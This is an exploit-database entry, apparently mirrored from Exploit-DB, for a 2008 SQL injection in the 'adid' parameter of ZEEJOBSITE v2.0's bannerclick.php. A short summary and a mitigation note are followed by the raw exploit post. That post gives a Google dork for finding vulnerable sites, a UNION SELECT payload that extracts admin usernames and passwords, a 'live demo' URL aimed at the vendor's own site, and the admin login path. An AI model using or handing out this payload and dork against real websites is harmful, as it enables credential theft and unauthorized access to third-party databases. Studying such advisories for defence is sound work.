ZEEJOBSITE v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability

vendor:

ZEEJOBSITE

by:

Hussin X

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: ZEEJOBSITE

Affected Version From: 2

Affected Version To: 2

Patch Exists: NO

Related CWE: N/A

CPE: a:zeeways:zeejobsite:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

ZEEJOBSITE v2.0 (bannerclick.php adid) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. The attacker can inject arbitrary SQL code in the vulnerable parameter 'adid' and execute it in the context of the application's database. This can be used to bypass authentication, access, modify and delete data within the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use parameterized queries to prevent SQL injection.

Source

Exploit-DB raw data:

|___________________________________________________|
|
| ZEEJOBSITE v2.0  (bannerclick.php adid) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
| script http://zeeways.com/main/products/ZEEJOBSITE-v2.0.html
|
| DorK : inurl:employer_profile.php?compid=
|___________________________________________________|

Exploit:  
________



www.[target].com/Script/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--




L!VE DEMO:
_________


http://www.zeejobsite.com/bannerclick.php?adid=-5+union+select+1,2,concat(name,0x3e,pwd),4,5,6,7,8,9+from+admin--




___________________


Admin  LogiN :

www.[target].com/Script/admin/


____________________________( Greetz )____________________________
|
|  tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
|   
|  jiko | CraCkEr | Iraqihack | FAHD | mos_chori | Silic0n | str0ke
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-08-15]